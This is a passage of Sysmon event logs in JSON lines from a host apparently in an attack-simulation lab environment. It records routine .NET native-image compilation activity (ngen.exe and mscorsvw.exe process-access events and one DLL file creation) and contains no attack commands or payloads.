C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:15.498","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1341-5F25-0000-0010AE840D00}","TargetProcessId":"4748","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8459,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:15.498\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1341-5F25-0000-0010AE840D00}\r\nTargetProcessId: 4748\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:15.498","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1341-5F25-0000-0010AE840D00}","TargetProcessId":"4748","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:02:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8460,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:15.513\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1377-5F25-0000-001004300F00}\r\nTargetProcessId: 4748\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:15.513","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1377-5F25-0000-001004300F00}","TargetProcessId":"4748","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8461,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:15.560\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4456\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1377-5F25-0000-00107A330F00}\r\nTargetProcessId: 3840\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:15.560","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4456","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1377-5F25-0000-00107A330F00}","TargetProcessId":"3840","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8462,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:15.560\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1377-5F25-0000-00107A330F00}\r\nTargetProcessId: 3840\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:15.560","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1377-5F25-0000-00107A330F00}","TargetProcessId":"3840","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:02:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8463,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:15.576\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1377-5F25-0000-00107A330F00}\r\nTargetProcessId: 3840\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:15.576","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1377-5F25-0000-00107A330F00}","TargetProcessId":"3840","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8464,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:02:15.857\r\nProcessGuid: {E2A3D6B1-1377-5F25-0000-00107A330F00}\r\nProcessId: 3840\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\f00-0\\System.Management.Instrumentation.dll\r\nCreationUtcTime: 2020-08-01 07:02:15.857","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:02:15.857","ProcessGuid":"{E2A3D6B1-1377-5F25-0000-00107A330F00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\f00-0\\System.Management.Instrumentation.dll","CreationUtcTime":"2020-08-01 07:02:15.857","EventReceivedTime":"2020-08-01 07:02:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8465,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:15.888\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1377-5F25-0000-001035370F00}\r\nTargetProcessId: 4064\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:15.888","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1377-5F25-0000-001035370F00}","TargetProcessId":"4064","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8466,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:15.888\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1377-5F25-0000-001035370F00}\r\nTargetProcessId: 4064\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:15.888","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1377-5F25-0000-001035370F00}","TargetProcessId":"4064","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:02:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
